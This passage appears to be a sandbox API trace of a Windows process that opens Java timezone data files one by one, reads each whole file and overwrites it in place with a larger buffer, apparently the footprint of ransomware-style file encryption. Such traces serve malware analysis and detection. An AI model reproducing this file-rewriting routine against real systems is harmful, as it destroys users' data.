1 [0141.198] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.199] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x7e5, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2e9f2d0*=0x7e5, lpOverlapped=0x0) returned 1 [0141.199] CloseHandle (hObject=0x1cc) returned 1 [0141.199] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.200] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.200] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x245 [0141.200] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.200] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.200] ReleaseMutex (hMutex=0x168) returned 1 [0141.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Samara", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Samara", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Samara", lpUsedDefaultChar=0x0) returned 6 [0141.200] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2e9f2bc*=0x245, lpOverlapped=0x0) returned 1 [0141.201] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.202] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2e9f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0141.202] CloseHandle (hObject=0x1cc) returned 1 [0141.202] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.203] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.203] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4b0 [0141.203] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.203] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.203] ReleaseMutex (hMutex=0x168) returned 1 [0141.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vienna", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vienna", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vienna", lpUsedDefaultChar=0x0) returned 6 [0141.203] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x4b0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2e9f2bc*=0x4b0, lpOverlapped=0x0) returned 1 [0141.210] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.210] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea51b8*, nNumberOfBytesToWrite=0xa38, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea51b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa38, lpOverlapped=0x0) returned 1 [0141.211] CloseHandle (hObject=0x1cc) returned 1 [0141.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.212] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.212] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x59 [0141.212] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.212] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.213] ReleaseMutex (hMutex=0x168) returned 1 [0141.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Antananarivo", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Antananarivo", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Antananarivo", lpUsedDefaultChar=0x0) returned 12 [0141.213] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbad70, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad70*, lpNumberOfBytesRead=0x2e9f2bc*=0x59, lpOverlapped=0x0) returned 1 [0141.214] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.214] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0141.214] CloseHandle (hObject=0x1cc) returned 1 [0141.215] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.215] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.215] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x69 [0141.216] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.216] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.216] ReleaseMutex (hMutex=0x168) returned 1 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mauritius", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mauritius", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mauritius", lpUsedDefaultChar=0x0) returned 9 [0141.216] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eb8c70, nNumberOfBytesToRead=0x69, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eb8c70*, lpNumberOfBytesRead=0x2e9f2bc*=0x69, lpOverlapped=0x0) returned 1 [0141.217] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.217] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5f1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5f1, lpOverlapped=0x0) returned 1 [0141.218] CloseHandle (hObject=0x1cc) returned 1 [0141.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.219] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.219] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x464 [0141.219] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.219] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.219] ReleaseMutex (hMutex=0x168) returned 1 [0141.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chatham", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chatham", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chatham", lpUsedDefaultChar=0x0) returned 7 [0141.219] ReadFile (in: hFile=0x1cc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x464, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2e9f2bc*=0x464, lpOverlapped=0x0) returned 1 [0141.879] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.879] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ec, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x9ec, lpOverlapped=0x0) returned 1 [0141.879] CloseHandle (hObject=0x1cc) returned 1 [0141.880] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.881] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.881] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d [0141.881] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.881] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.881] ReleaseMutex (hMutex=0x168) returned 1 [0141.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Galapagos", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Galapagos", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Galapagos", lpUsedDefaultChar=0x0) returned 9 [0141.881] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fe28, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fe28*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0141.895] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.895] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0141.896] CloseHandle (hObject=0x1cc) returned 1 [0141.896] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0151.913] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0151.913] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x59 [0151.913] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0151.913] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0151.913] ReleaseMutex (hMutex=0x168) returned 1 [0151.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kwajalein", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0151.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kwajalein", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kwajalein", lpUsedDefaultChar=0x0) returned 9 [0151.914] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fbad70, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad70*, lpNumberOfBytesRead=0x2e9f2bc*=0x59, lpOverlapped=0x0) returned 1 [0151.915] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0151.915] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0151.916] CloseHandle (hObject=0x1dc) returned 1 [0154.626] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0154.627] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.627] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d [0154.627] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.628] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.628] ReleaseMutex (hMutex=0x168) returned 1 [0154.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pago_Pago", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0154.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pago_Pago", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pago_Pago", lpUsedDefaultChar=0x0) returned 9 [0154.628] ReadFile (in: hFile=0x204, lpBuffer=0x1f9fe28, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fe28*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0154.815] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0154.815] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0154.816] CloseHandle (hObject=0x204) returned 1 [0154.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0154.821] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.821] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x41 [0154.821] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.821] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.821] ReleaseMutex (hMutex=0x168) returned 1 [0154.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tarawa", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0154.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tarawa", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tarawa", lpUsedDefaultChar=0x0) returned 6 [0154.822] ReadFile (in: hFile=0x1d8, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2e9f2bc*=0x41, lpOverlapped=0x0) returned 1 [0154.823] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0154.823] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0154.823] CloseHandle (hObject=0x1d8) returned 1 [0154.823] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0154.824] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.825] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x8f0 [0154.825] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.825] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.825] ReleaseMutex (hMutex=0x168) returned 1 [0154.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CST6CDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0154.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CST6CDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CST6CDT", lpUsedDefaultChar=0x0) returned 7 [0154.825] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a7bc8, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesRead=0x2e9f2bc*=0x8f0, lpOverlapped=0x0) returned 1 [0154.877] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0154.877] WriteFile (in: hFile=0x1d8, lpBuffer=0x288b148*, nNumberOfBytesToWrite=0xe78, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288b148*, lpNumberOfBytesWritten=0x2e9f2d0*=0xe78, lpOverlapped=0x0) returned 1 [0154.878] CloseHandle (hObject=0x1d8) returned 1 [0154.878] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0154.879] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.880] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1b [0154.880] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.880] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.880] ReleaseMutex (hMutex=0x168) returned 1 [0154.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YST9", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 